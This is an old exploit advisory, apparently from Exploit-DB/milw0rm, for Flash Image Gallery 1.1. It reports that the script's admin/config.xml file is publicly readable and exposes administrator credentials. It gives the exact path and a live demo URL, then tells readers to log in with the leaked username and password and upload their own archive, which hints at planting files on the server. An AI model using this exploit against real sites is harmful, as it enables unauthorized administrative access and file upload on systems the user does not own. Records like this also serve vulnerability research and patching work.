Flash Image Gallery 1.1 - Arbitrary Configuration File Disclosure

EDB-ID:

8805

CVE:

N/A




Platform:

PHP

Date:

2009-05-26


#########################################################################################
[0x01] Informations:

Script         : Flash Image Gallery 1.1 and maybe last version
Download       : http://www.flashimagegallery.com/download/fig_116_admin_110.zip
Vulnerability  : Sensitive Data Disclosure
Author         : DarkbiteX
Greets:        : |OverclockiX| , |0o_Zeuz_o0|, |Status-X|, |Fatal Inside|, |NaOnack|, |Good-Spide|, |All Moroccan Hackers|

########################################################################################
Bug:[Sensitive Data Disclosure]
########################################################################################

[!] EXPLOIT: /[path]/admin/config.xml
EXAMPLE: http://www.flashimagegallery.com/demo/gallery/admin/config.xml
                 and paste de user and pass http://www.flashimagegallery.com/demo/gallery/admin/
                
                 Use Of The Imagination and UPLOAD your archive ;) 
#########################################################################################

# milw0rm.com [2009-05-26]